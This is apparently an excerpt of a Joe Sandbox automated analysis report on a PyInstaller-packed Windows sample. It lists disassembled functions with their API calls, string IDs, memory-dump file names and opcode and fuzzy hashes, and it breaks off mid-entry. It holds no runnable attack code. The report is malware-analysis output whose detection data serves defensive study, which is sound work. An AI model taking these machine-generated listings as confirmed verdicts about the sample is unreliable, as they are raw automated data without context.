                                                                                                                                                                                                      Function 00007FFBBCD44CEA Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 162COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileHeader$ExceptionRaise
                                                                                                                                                                                                      • String ID: Access violation - no RTTI data!$Attempted a typeid of nullptr pointer!$Bad dynamic_cast!$Bad read pointer - no RTTI data!
                                                                                                                                                                                                      • API String ID: 3685223789-928371585
                                                                                                                                                                                                      • Opcode ID: 4f73c46b7be505823b8c23bdf2e01a106e3a134808b8006f3c7a9710838bb3a8
                                                                                                                                                                                                      • Instruction ID: e0092892d939752f0e81f1d4de5c26a20401f8c06c28e66e6befe15a9ecd22aa
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f73c46b7be505823b8c23bdf2e01a106e3a134808b8006f3c7a9710838bb3a8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4051B2EAB19A4693DE20CB38E4A95B96360FF44B84F508436DB8D07764EF3CE585C704
                                                                                                                                                                                                      Function 00007FFBBB608368 Relevance: 10.6, APIs: 7, Instructions: 133threadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyType_GetModuleState.PYTHON313(?,?,?,00000000,?,?,?,00007FFBBB608041), ref: 00007FFBBB60839D
                                                                                                                                                                                                      • PyBytes_FromStringAndSize.PYTHON313(?,?,?,00000000,?,?,?,00007FFBBB608041), ref: 00007FFBBB6083BB
                                                                                                                                                                                                      • PyList_New.PYTHON313(?,?,?,00000000,?,?,?,00007FFBBB608041), ref: 00007FFBBB6083D1
                                                                                                                                                                                                      • PyEval_SaveThread.PYTHON313(?,?,?,00000000,?,?,?,00007FFBBB608041), ref: 00007FFBBB60840E
                                                                                                                                                                                                      • PyEval_RestoreThread.PYTHON313(?,?,?,00000000,?,?,?,00007FFBBB608041), ref: 00007FFBBB608427
                                                                                                                                                                                                      • _Py_Dealloc.PYTHON313(?,?,?,00000000,?,?,?,00007FFBBB608041), ref: 00007FFBBB6084EC
                                                                                                                                                                                                      • _Py_Dealloc.PYTHON313(?,?,?,00000000,?,?,?,00007FFBBB608041), ref: 00007FFBBB6146C2
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DeallocEval_Thread$Bytes_FromList_ModuleRestoreSaveSizeStateStringType_
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2831925710-0
                                                                                                                                                                                                      • Opcode ID: 16fbac790653686bbe248a4dcbfb097c7ce403cfd3436c25cc9141e3a4c4f252
                                                                                                                                                                                                      • Instruction ID: 14fe3315cea6b60441324f4591efc899307fc2f873b25dc65b5ec4b63a5ddf61
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 16fbac790653686bbe248a4dcbfb097c7ce403cfd3436c25cc9141e3a4c4f252
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AC5174B3A0871185EA60DB2AE884579B394FB44754F598235DF5E433A0DF3CDC45C308
                                                                                                                                                                                                      Function 00007FFBBCD4D444 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Name::operator+
                                                                                                                                                                                                      • String ID: {for
                                                                                                                                                                                                      • API String ID: 2943138195-864106941
                                                                                                                                                                                                      • Opcode ID: c8c0eb25e8b680b21b04dbc78bc85cadbb1d2f305e65e2eabc9fe04fafa5b067
                                                                                                                                                                                                      • Instruction ID: 376d3c8be2d0d8e8f8de36bb27b9fafe56b62a7bcc696eb32867fd22fe506c01
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c8c0eb25e8b680b21b04dbc78bc85cadbb1d2f305e65e2eabc9fe04fafa5b067
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F5115F6B08A85A9FB01DF38D4483A833A1EB45748F848031EB4D47A99DF78D555C718
                                                                                                                                                                                                      Function 00007FFBBB60857C Relevance: 10.6, APIs: 7, Instructions: 125threadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DeallocEval_Thread$Bytes_FromList_ModuleRestoreSaveSizeStateStringType_
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2831925710-0
                                                                                                                                                                                                      • Opcode ID: b56d12ae4060c59d5afa07068ebeba48d0cc5cea2c731143b3892cc892e1be47
                                                                                                                                                                                                      • Instruction ID: eb316a00948d45ce5feeb5ac02177c4ed87dcb4096bc4fb5c6344c98eddb8a6a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b56d12ae4060c59d5afa07068ebeba48d0cc5cea2c731143b3892cc892e1be47
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 395196A2A19B4285EE648B3ADD54139B3A0FB49B60F599235DF5E037A0DF3CEC50C704
                                                                                                                                                                                                      Function 00007FFBBB639C04 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507696476.00007FFBBB631000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFBBB630000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507671623.00007FFBBB630000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507721671.00007FFBBB63D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507748441.00007FFBBB641000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507768534.00007FFBBB642000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb630000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Dealloc$Bytes_FromSizeStringmemcpy
                                                                                                                                                                                                      • String ID: Unable to allocate output buffer.
                                                                                                                                                                                                      • API String ID: 76732796-2565006440
                                                                                                                                                                                                      • Opcode ID: a4c92701f9ed141fd0d8f748463699b631f7ae9b4821ca4873bd1ff5d75ee438
                                                                                                                                                                                                      • Instruction ID: ad46654b589242d799433c9a9ddab3cbfea5f3b14a98a3249eb46da5aa00c3fa
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a4c92701f9ed141fd0d8f748463699b631f7ae9b4821ca4873bd1ff5d75ee438
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0541EAB3A19A0281EB598F2ED940269A7A0FB48F94F189432DF1F477A5DF7CD891C704
                                                                                                                                                                                                      Function 00007FFBBCD4CA04 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: NameName::atol
                                                                                                                                                                                                      • String ID: `template-parameter$void
                                                                                                                                                                                                      • API String ID: 2130343216-4057429177
                                                                                                                                                                                                      • Opcode ID: 39600c2fadeceed4c6c28385a1cdb72227216fd67de7d66948b2e2ddd060d726
                                                                                                                                                                                                      • Instruction ID: 368e71291f6872c69fec9b51283af56fc5b3ede9056ad3dda157c157a3aa7b7a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 39600c2fadeceed4c6c28385a1cdb72227216fd67de7d66948b2e2ddd060d726
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F4148EAB08B5288FB00CBB8D8592FD2371BF58B88F941135CF4D66659EF78A545C344
                                                                                                                                                                                                      Function 00007FF7FF58DD38 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF7FF58DFEA,?,?,?,00007FF7FF58DCDC,?,?,?,00007FF7FF58D8D9), ref: 00007FF7FF58DDBD
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF7FF58DFEA,?,?,?,00007FF7FF58DCDC,?,?,?,00007FF7FF58D8D9), ref: 00007FF7FF58DDCB
                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF7FF58DFEA,?,?,?,00007FF7FF58DCDC,?,?,?,00007FF7FF58D8D9), ref: 00007FF7FF58DDF5
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF7FF58DFEA,?,?,?,00007FF7FF58DCDC,?,?,?,00007FF7FF58D8D9), ref: 00007FF7FF58DE63
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF7FF58DFEA,?,?,?,00007FF7FF58DCDC,?,?,?,00007FF7FF58D8D9), ref: 00007FF7FF58DE6F
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                      • String ID: api-ms-
                                                                                                                                                                                                      • API String ID: 2559590344-2084034818
                                                                                                                                                                                                      • Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                      • Instruction ID: 034e6306d75accbdad8fbccfff273b72e78dc3c04545962a54b6a043a30d2287
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC316E21B1A68291EF52AB12A8005B5A7D4FF58BA0FD94635ED3D073D4EF3CE458C2A0
                                                                                                                                                                                                      Function 00007FFBBCD475D0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 81COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Name::operator+
                                                                                                                                                                                                      • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                                                                                                                      • API String ID: 2943138195-2211150622
                                                                                                                                                                                                      • Opcode ID: 8129fa0169d6cc1cc5ca1a8c8b43bbbd082598864b82464398da58a00a821778
                                                                                                                                                                                                      • Instruction ID: 02a78879a7a80cb59be2f3330ca9eccf81c3c36cfb716d3bd061b3417808413e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8129fa0169d6cc1cc5ca1a8c8b43bbbd082598864b82464398da58a00a821778
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 784115EAB08B8698F741CB7CD8482BC37A0BB04348F984535DB4C16394EF7CA946C708
                                                                                                                                                                                                      Function 00007FFBBCD49554 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Name::operator+
                                                                                                                                                                                                      • String ID: char $int $long $short $unsigned
                                                                                                                                                                                                      • API String ID: 2943138195-3894466517
                                                                                                                                                                                                      • Opcode ID: a795c7ce3634cae38f4d320bfb7043b724aba026ad47a4d3d8bcb9e9dd899c8c
                                                                                                                                                                                                      • Instruction ID: 2a6c48d53bcaf9ac9f80402c1588e5d9693b901885534e8f5aee6860a6825129
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a795c7ce3634cae38f4d320bfb7043b724aba026ad47a4d3d8bcb9e9dd899c8c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 97313AFAB18A5189EB02CB7DD8982BC37B4BB08748F548135DB1C56B98DF38E904C708
                                                                                                                                                                                                      Function 00007FF7FF582A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF7FF58351A,?,00000000,00007FF7FF583F23), ref: 00007FF7FF582AA0
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                      • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                      • API String ID: 2050909247-2900015858
                                                                                                                                                                                                      • Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                      • Instruction ID: 496f0574b170c3ee05a47b060994296b557076bf22040d951dd61f4e7a784b42
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2821A3326197C192E720AB51B8417E6A794FB887C4F800231EEAD43699DF7CD645C790
                                                                                                                                                                                                      Function 00007FF7FF588760 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 995526605-0
                                                                                                                                                                                                      • Opcode ID: 2fab73a517e5e84f4798a751f7d9f27a96a1384f55cc7f8e1d1021d9771b9e73
                                                                                                                                                                                                      • Instruction ID: 31d7f8be36e7431e17f9a85cd543db170859c106f42b0e6d533bb689fe0fbb5b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2fab73a517e5e84f4798a751f7d9f27a96a1384f55cc7f8e1d1021d9771b9e73
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 62217E21A0C68342EB10AB55F4942AAE7A0FB857A0F900735EABD47AE4DF6CD455CB90
                                                                                                                                                                                                      Function 00007FF7FF59B1C0 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Value$ErrorLast
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2506987500-0
                                                                                                                                                                                                      • Opcode ID: 64d992c46ee3b7395fe78fb810fe312dfe396e54660f00f57cdb80144ae96788
                                                                                                                                                                                                      • Instruction ID: 784c47c2e81931832228ac7914824a95dcd60d85791ae149f28b2d624b9da380
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 64d992c46ee3b7395fe78fb810fe312dfe396e54660f00f57cdb80144ae96788
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 50217C24E0D6CA92FB7C736156511FDE2829F447A0F948734D93E47AE6DE2CA40183E0
                                                                                                                                                                                                      Function 00007FFBBB6322D4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 58threadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507696476.00007FFBBB631000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFBBB630000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507671623.00007FFBBB630000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507721671.00007FFBBB63D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507748441.00007FFBBB641000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507768534.00007FFBBB642000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb630000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Dealloc$Err_StringThread_allocate_lockmemset
                                                                                                                                                                                                      • String ID: Unable to allocate lock$compresslevel must be between 1 and 9
                                                                                                                                                                                                      • API String ID: 451674277-2500606449
                                                                                                                                                                                                      • Opcode ID: a38d9172713ad1f46b3fa9721c5749e80862db88273002e46d4f79451db2f167
                                                                                                                                                                                                      • Instruction ID: 919f304abb8ea69e3e97b41c6a82bee4d785f3935922b64786d705962ec60f20
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a38d9172713ad1f46b3fa9721c5749e80862db88273002e46d4f79451db2f167
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A721B5A3A09A0681EB149B3DEC8537CA3A4BF59B48F588135CB0F426B5DE3CEC55C718
                                                                                                                                                                                                      Function 00007FFBBB63383C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53threadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507696476.00007FFBBB631000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFBBB630000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507671623.00007FFBBB630000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507721671.00007FFBBB63D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507748441.00007FFBBB641000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507768534.00007FFBBB642000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb630000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DeallocString$Bytes_Err_FromSizeThread_allocate_lock
                                                                                                                                                                                                      • String ID: Unable to allocate lock
                                                                                                                                                                                                      • API String ID: 553681934-3516605728
                                                                                                                                                                                                      • Opcode ID: 31b2bb2a81d768a39f46c27a77fbce41591dc4b3623782c16d271c9a058ee8dc
